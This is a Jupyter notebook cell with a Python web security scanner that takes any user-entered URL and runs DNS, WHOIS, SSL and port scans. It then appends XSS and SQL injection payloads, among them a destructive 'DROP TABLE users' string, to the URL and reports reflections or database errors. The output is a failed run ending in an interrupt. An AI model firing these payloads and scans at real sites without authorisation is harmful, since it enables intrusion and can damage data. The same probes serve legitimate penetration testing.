In [20]:
import requests
from bs4 import BeautifulSoup
import urllib.parse
import socket
import ssl
from concurrent.futures import ThreadPoolExecutor
import re
import dns.resolver
import whois
from datetime import datetime

def check_ssl(domain):
    try:
        context = ssl.create_default_context()
        with socket.create_connection((domain, 443)) as sock:
            with context.wrap_socket(sock, server_hostname=domain) as ssock:
                cert = ssock.getpeercert()
                expiry_date = datetime.strptime(cert['notAfter'], '%b %d %H:%M:%S %Y %Z')
                days_to_expire = (expiry_date - datetime.now()).days
                print(f"[+] SSL Certificate is valid for {domain}")
                print(f"[+] Certificate expires in {days_to_expire} days")
                print(f"[+] Issuer: {dict(x[0] for x in cert['issuer'])}")
                return True
    except Exception as e:
        print(f"[-] SSL Certificate issue found for {domain}: {str(e)}")
        return False

def check_xss(url):
    payloads = [
        '<script>alert(1)</script>',
        "';alert(1);'",
        '<img src=x onerror=alert(1)>',
        '"><script>alert(1)</script>',
        'javascript:alert(1)',
        '<svg/onload=alert(1)>',
        '"><img src=x onerror=alert(1)>'
    ]
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'}
    
    for payload in payloads:
        test_url = url + payload
        try:
            response = requests.get(test_url, headers=headers, verify=False, timeout=5)
            if payload in response.text:
                print(f"[!] Potential XSS vulnerability found at: {url}")
                print(f"[!] Payload: {payload}")
                return
            
            # Check for reflected content
            soup = BeautifulSoup(response.text, 'html.parser')
            if soup.find(text=re.compile(re.escape(payload))):
                print(f"[!] Potential XSS vulnerability (reflected) found at: {url}")
                print(f"[!] Payload: {payload}")
                return
        except Exception as e:
            print(f"[-] Error testing XSS payload: {str(e)}")
            continue
    print("[+] No obvious XSS vulnerabilities found")

def check_sql_injection(url):
    payloads = [
        "'", 
        "1' OR '1'='1", 
        "1; DROP TABLE users",
        "' OR '1'='1' --",
        "' UNION SELECT NULL--",
        "admin' --",
        "' OR 1=1#",
        "') OR ('1'='1",
        "' HAVING 1=1--",
        "' GROUP BY columnnames having 1=1--"
    ]
    error_patterns = [
        "SQL",
        "mysql",
        "ORA-",
        "PostgreSQL",
        "SQLite",
        "Microsoft SQL Server",
        "syntax error",
        "mysql_fetch",
        "Error Occurred While Processing Request"
    ]
    
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'}
    
    for payload in payloads:
        test_url = url + payload
        try:
            response = requests.get(test_url, headers=headers, verify=False, timeout=5)
            response_text = response.text.lower()
            
            for pattern in error_patterns:
                if pattern.lower() in response_text:
                    print(f"[!] Potential SQL Injection vulnerability found at: {url}")
                    print(f"[!] Payload: {payload}")
                    print(f"[!] Error Pattern Found: {pattern}")
                    return
                
            # Check for response time-based injection
            if response.elapsed.total_seconds() > 5:
                print(f"[!] Potential time-based SQL Injection vulnerability found at: {url}")
                print(f"[!] Payload: {payload}")
                return
        except Exception as e:
            print(f"[-] Error testing SQL injection payload: {str(e)}")
            continue
    print("[+] No obvious SQL Injection vulnerabilities found")

def scan_open_ports(domain):
    common_ports = {
        21: "FTP",
        22: "SSH",
        23: "Telnet",
        25: "SMTP",
        53: "DNS",
        80: "HTTP",
        443: "HTTPS",
        445: "SMB",
        3306: "MySQL",
        3389: "RDP",
        8080: "HTTP-Proxy",
        8443: "HTTPS-Alt",
        1433: "MSSQL",
        5432: "PostgreSQL",
        27017: "MongoDB",
        6379: "Redis"
    }
    
    open_ports = []
    
    def check_port(port):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(1)
            result = sock.connect_ex((domain, port))
            if result == 0:
                try:
                    service_banner = sock.recv(1024).decode().strip()
                    return (port, service_banner)
                except:
                    return (port, "Unknown")
            sock.close()
            return None
        except:
            return None
    
    with ThreadPoolExecutor(max_workers=10) as executor:
        results = list(executor.map(check_port, common_ports.keys()))
    
    open_ports = [r for r in results if r is not None]
    
    if open_ports:
        print("[!] Open ports found:")
        for port, banner in open_ports:
            print(f"[!] Port {port} ({common_ports[port]}): {banner}")
    else:
        print("[+] No common open ports found")

def check_dns_records(domain):
    record_types = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'SOA']
    print("\nChecking DNS Records...")
    
    for record_type in record_types:
        try:
            answers = dns.resolver.resolve(domain, record_type)
            print(f"[+] {record_type} Records:")
            for rdata in answers:
                print(f"    {rdata}")
        except Exception as e:
            print(f"[-] Error getting {record_type} record: {str(e)}")

def check_whois_info(domain):
    try:
        w = whois.whois(domain)
        print("\nWHOIS Information:")
        print(f"[+] Registrar: {w.registrar}")
        print(f"[+] Creation Date: {w.creation_date}")
        print(f"[+] Expiration Date: {w.expiration_date}")
        print(f"[+] Name Servers: {w.name_servers}")
    except Exception as e:
        print(f"[-] Error getting WHOIS information: {str(e)}")

def check_security(url):
    print("\n=== Starting Enhanced Security Scan ===\n")
    
    # Parse the URL
    parsed_url = urllib.parse.urlparse(url)
    domain = parsed_url.netloc
    
    # Basic checks
    print(f"Scanning target: {url}\n")
    
    # WHOIS Information
    check_whois_info(domain)
    
    # DNS Records
    check_dns_records(domain)
    
    # Check SSL
    print("\nChecking SSL certificate...")
    check_ssl(domain)
    
    # Check for open ports
    print("\nChecking for open ports...")
    scan_open_ports(domain)
    
    # Check HTTP Headers
    try:
        response = requests.head(url)
        print("\nHTTP Headers:")
        for header, value in response.headers.items():
            print(f"[+] {header}: {value}")
    except Exception as e:
        print(f"[-] Error checking HTTP headers: {str(e)}")
    
    # Check for XSS vulnerabilities
    print("\nChecking for XSS vulnerabilities...")
    check_xss(url)
    
    # Check for SQL Injection
    print("\nChecking for SQL Injection vulnerabilities...")
    check_sql_injection(url)
    
    print("\n=== Enhanced Scan Complete ===")

# Example usage
target_url = input("Enter the target website URL (including http:// or https://): ")
check_security(target_url)



=== Starting Enhanced Security Scan ===

Scanning target: 

[-] Error getting WHOIS information: module 'whois' has no attribute 'whois'

Checking DNS Records...
[-] Error getting A record: The DNS response does not contain an answer to the question: . IN A
[-] Error getting AAAA record: The DNS response does not contain an answer to the question: . IN AAAA
[-] Error getting MX record: The DNS response does not contain an answer to the question: . IN MX
[+] NS Records:
    k.root-servers.net.
    j.root-servers.net.
    f.root-servers.net.
    m.root-servers.net.
    i.root-servers.net.
    e.root-servers.net.
    a.root-servers.net.
    d.root-servers.net.
    c.root-servers.net.
    b.root-servers.net.
    l.root-servers.net.
    h.root-servers.net.
    g.root-servers.net.
[-] Error getting TXT record: The DNS response does not contain an answer to the question: . IN TXT
[+] SOA Records:
    a.root-servers.net. nstld.verisign-grs.com. 2024103100 1800 900 604800 86400

Checking SSL c

KeyboardInterrupt: 